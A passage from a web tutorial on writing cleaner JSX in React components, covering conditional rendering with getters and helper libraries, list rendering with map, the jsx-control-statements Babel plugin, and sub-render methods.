verify the condition: canShowSecretData() { const { dataIsReady, isAdmin, userHasPermissions } = this.props return dataIsReady&& (isAdmin || userHasPermissions) } <div> {this.canShowSecretData() &&<SecretData />} </div> As you can see, this change makes the code more readable and the condition more explicit. Looking into this code in six month time you will still find it clear just by reading the name of the function. If we do not like using functions you can use object's getters which make the code more elegant. For example, instead of declaring a function we define a getter: get canShowSecretData() { const { dataIsReady, isAdmin, userHasPermissions } = this.props return dataIsReady&& (isAdmin || userHasPermissions) } <div> {this.canShowSecretData&&<SecretData />} </div> The same applies to computed properties: suppose you have two single properties for currency and value. Instead of creating the price string inside you render method you can create a class function for that: getPrice() { return `${this.props.currency}${this.props.value}` } <div>{this.getPrice()}</div> Which is better because it is isolated and you can easily test it in case it contains logic. Alternatively going a step further and, as we have just seen, use getters: get price() { return `${this.props.currency}${this.props.value}` } <div>{this.price}</div> Going back to conditional statements, there are other solutions that require using external dependencies. A good practice is to avoid external dependencies as much as we can to keep our bundle smaller but it may be worth it in this particular case because improving the readability of our templates is a big win. The first solution is renderIf which we can install with: npm install --save render-if And easily use in our projects like this: const { dataIsReady, isAdmin, userHasPermissions } = this.props constcanShowSecretData = renderIf(dataIsReady&& (isAdmin || userHasPermissions)) <div> {canShowSecretData(<SecretData />)} </div> We wrap our conditions inside the renderIf function. The utility function that gets returned can be used as a function that receives the JSX markup to be shown when the condition is true. One goal that we should always keep in mind is never to add too much logic inside our components. Some of them obviously will require a bit of it but we should try to keep them as simple and dumb as possible in a way that we can spot and fix error easily. At least, we should try to keep the renderIf method as clean as possible and for doing that we could use another utility library called React Only If which let us write our components as if the condition is always true by setting the conditional function using a higher-order component. To use the library we just need to install it: npm install --save react-only-if Once it is installed, we can use it in our apps in the following way: constSecretDataOnlyIf = onlyIf( SecretData, ({ dataIsReady, isAdmin, userHasPermissions }) => { return dataIsReady&& (isAdmin || userHasPermissions) } ) <div> <SecretDataOnlyIf dataIsReady={...} isAdmin={...} userHasPermissions={...} /> </div>  As you can see here there is no logic at all inside the component itself. We pass the condition as the second parameter of the onlyIf function when the condition is matched, the component gets rendered. The function that is used to validate the condition receives the props, the state, and the context of the component. In this way we avoid polluting our component with conditionals so that it is easier to understand and reason about. Loops A very common operation in UI development is displaying lists of items. When it comes to showing lists we realize that using JavaScript as a template language is a very good idea. If we write a function that returns an array inside our JSX template, each element of the array gets compiled into an element. As we have seen before we can use any JavaScript expressions inside curly braces and the more obvious way to generate an array of elements, given an array of objects is using map. Let's dive into a real-world example, suppose you have a list of users, each one with a name property attached to it. To create an unordered list to show the users you can do: <ul> {users.map(user =><li>{user.name}</li>)} </ul> This snippet is in incredibly simple and incredibly powerful at the same time, where the power of the HTML and the JavaScript converge. Control Statements Conditional and loops are very common operations in UI templates and you may feel wrong using the JavaScript ternary or the map function to do that. JSX has been built in a way that it only abstract the creation of the elements leaving the logic parts to real JavaScript which is great but sometimes the code could become less clear. In general, we aim to remove all the logic from our components and especially from our render method but sometimes we have to show and hide elements according to the state of the application and very often we have to loop through collections and arrays. If you feel that using JSX for that kind of operations would make your code more readable there is a Babel plugin for that: jsx-control-statements. It follows the same philosophy of JSX and it does not add any real functionality to the language, it is just a syntactic sugar that gets compiled into JavaScript. Let's see how it works. First of all, we have to install it: npm install --save jsx-control-statements Once it is installed we have to add it to the list of our babel plugins in our .babelrc file: "plugins": ["jsx-control-statements"] From now on we can use the syntax provided by the plugin and Babel will transpile it together with the common JSX syntax. A conditional statement written using the plugin looks like the following snippet: <If condition={this.canShowSecretData}> <SecretData /> </If> Which get transpiled into a ternary expression: {canShowSecretData ? <SecretData /> : null} The If component is great but if for some reasons you have nested conditions in your render method it can easily become messy and hard to follow. Here is where the Choose component comes to help: <Choose> <When condition={...}> <span>if</span> </When> <When condition={...}> <span>else if</span> </When> <Otherwise> <span>else</span> </Otherwise> </Choose>   Please notice that the code above gets transpiled into multiple ternaries. Last but not least there is a "component" (always remember that we are not talking about real components but just a syntactic sugar) to manage the loops which is very convenient as well. <ul> <For each="user" of={this.props.users}> <li>{user.name}</li> </For> </ul> The code above gets transpiled into a map function, no magic in there. If you are used to using linters, you might wonder how the linter is not complaining about that code. In fact, the variable item doesn't exist before the transpilation nor it is wrapped into a function. To avoid those linting errors there's another plugin to install: eslint-plugin-jsx-control-statements. If you did not understand the previous sentence don't worry: in the next section we will talk about linting. Sub-render It is worth stressing that we always want to keep our components very small and our render methods very clean and simple. However, that is not an easy goal, especially when you are creating an application iteratively and in the first iteration you are not sure exactly how to split the components into smaller ones. So, what should we be doing when the render method becomes big to keep it maintainable? One solution is splitting it into smaller functions in a way that let us keeping all the logic in the same component. Let's see an example: renderUserMenu() { // JSX for user menu } renderAdminMenu() { // JSX for admin menu } render() { return ( <div> <h1>Welcome back!</h1> {this.userExists&&this.renderUserMenu()} {this.userIsAdmin&&this.renderAdminMenu()} </div> ) }  This is not always considered a best practice because it seems more obvious to split the component into smaller ones but sometimes it helps just to keep the render method cleaner. For example in the Redux Real World examples a sub-render method is used to render the load more button. Now that we are JSX power user it is time to move on and see how to follow a style guide within our code to make it consistent. Summary In this article we deeply understood how JSX works and how to use it in the right way in our components. We started from the basics of the syntax to create a solid knowledge that will let us mastering JSX and its features. Resources for Article: Further resources on this subject: Getting Started with React and Bootstrap [article] Create Your First React Element [article] Getting Started [article]
Read more
  • 0
  • 0
  • 40753
Modal Close icon
Modal Close icon